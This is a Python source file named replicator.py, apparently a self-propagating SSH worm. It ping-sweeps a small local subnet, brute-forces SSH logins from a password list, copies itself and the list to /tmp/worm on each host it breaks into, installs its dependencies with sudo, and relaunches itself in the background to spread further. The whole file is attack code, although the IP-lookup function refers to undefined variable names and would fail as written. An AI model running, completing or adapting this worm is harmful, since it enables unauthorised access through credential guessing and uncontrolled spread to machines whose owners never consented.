replicator.py

1. #!/usr/bin/env python
2.  
3. import paramiko
4. import sys
5. import os
6. import netifaces
7. import subprocess
8. import time
9. import logging
10.  
11. ##################################################################
12. # Function that will ping all IP addresses within the given range and
13. # store all IP addresses that responded
14. # @return - A list of all responding IP addresses withing the range
15. ##################################################################
16. def get_list_of_hosts():
17.     hostlist = []
18.     my_IP_address = get_current_IP_address('en0')
19.     FNULL = open(os.devnull, 'w')
20.  
21.     #Loop trough 10 different IP's and check if any one of them respons.
22.     for ping in range(1,10):
23.         address = "192.168.2." + str(ping)
24.  
25.         #Don't ping my own IP
26.         if(address != my_IP_address):
27.             #Do a ping and turn of output to console
28.             res = subprocess.call(['ping', '-c', '3', address],stdout=FNULL, stderr=subprocess.STDOUT)
29.             if res == 0:
30.                 hostlist.append(address)
31.     return hostlist
32.  
33. ##################################################################
34. # Function that will try to establish a ssh connection trying different combinations of usernames and passwords.
35. # If a connection is valid then it will call the UploadFileAndExecute function
36. ##################################################################
37. def Attack_SSH(ipAddress) :
38.     logging.info("Attacking Host : %s " %ipAddress)
39.     ssh = paramiko.SSHClient()
40.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
41.  
42.     # For each username and password combination try to establish a connection.
43.     for line in open("./passwords.txt", "r").readlines() :
44.         [username, password] = line.strip().split()
45.  
46.         try :
47.             logging.info("Trying with username: %s password: %s " % (username, password))
48.             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
49.             ssh.connect(ipAddress, username=username, password=password)
50.  
51.         except paramiko.AuthenticationException:
52.             logging.info("Failed...")
53.             continue
54.        
55.         logging.info("Success ... username: %s and passoword %s is VALID! " % (username, password))
56.         UploadFileAndExecute(ssh)
57.         break
58.  
59. ##################################################################
60. # Open a SSH File Transfer Protocol, and transfer worm files to the reciving machine.
61. # Once all the files are uploaded, it will install the nessesary libraries and run the worm.
62. ##################################################################
63. def UploadFileAndExecute(sshConnection) :
64.     print("Upload files to connection...")
65.     sftpClient = sshConnection.open_sftp()
66.  
67.     # Create folder to store worm files in
68.     stdin, stdout, stderr = sshConnection.exec_command("mkdir /tmp/worm")
69.     stdout.channel.recv_exit_status() # Blocking call    
70.     logging.info("Created folder /tmp/worm")
71.    
72.     # Replicate worm files
73.     sftpClient.put("./replicator.py", "/tmp/worm/" + "./replicator.py")
74.     logging.info("Added replicator.py")
75.  
76.     sftpClient.put("./passwords.txt", "/tmp/worm/" +"./passwords.txt")
77.     logging.info("Added passwords.txt")
78.  
79.     logging.info("Installing python3-pip")
80.     # Install python pip
81.     stdin, stdout, stderr = sshConnection.exec_command("sudo apt -y install python3-pip")  
82.     stdout.channel.recv_exit_status()
83.     logging.info("Finished installing python3-pip")
84.  
85.    
86.     # Install paramiko
87.     logging.info("Installing paramiko")
88.     stdin, stdout, stderr = sshConnection.exec_command("sudo apt-get -y install python-paramiko")  
89.     stdout.channel.recv_exit_status()  
90.     logging.info("Finished installing paramiko")
91.  
92.     # Install netifaces
93.     logging.info("Installing netifaces")
94.     stdin, stdout, stderr = sshConnection.exec_command("sudo apt-get -y install python-netifaces")  
95.     stdout.channel.recv_exit_status()  
96.     logging.info("Finished installing netifaces")
97.  
98.     stdin, stdout, stderr = sshConnection.exec_command("chmod a+x /tmp/worm/" +"replicator.py")  
99.     stdout.channel.recv_exit_status()  
100.  
101.     stdin, stdout, stderr = sshConnection.exec_command("nohup python /tmp/worm/" +"replicator.py passwords.txt"+ " &")  
102.     stdout.channel.recv_exit_status()  
103.  
104.  
105.  
106. ##################################################################
107. # Function that retrives the IP address for the current machine.
108. # @ return - IP address
109. ##################################################################
110. def get_current_IP_address(interface):
111.         # Get all the network interfaces on the system
112.         network_interfaces = netifaces.interfaces()
113.         ip_Address = None
114.  
115.         # Loop through all the interfaces and get IP address
116.         for netFace in networkInterfaces:
117.  
118.             # The IP address of the interface
119.             try:
120.                 addr = netifaces.ifaddresses(netFace)[2][0]['addr']
121.             except:
122.                 continue
123.  
124.             if not addr == "127.0.0.1":
125.                 ip_Address = addr
126.         return ipAddr
127.  
128.  
129.  
130. if __name__ == "__main__" :
131.     logging.basicConfig(filename='worm.log',level=logging.DEBUG)
132.     logging.getLogger("paramiko").setLevel(logging.WARNING)
133.     logging.info('Staring worm...')
134.  
135.     hostlist = get_list_of_hosts()
136.     list_string = str(hostlist)
137.     logging.info("Available hosts are: " + list_string)
138.  
139.     #Loop trough the list of all responding IP's and try to connect with ssh
140.     for host in hostlist:
141.         Attack_SSH(host)
142.     logging.info("Done")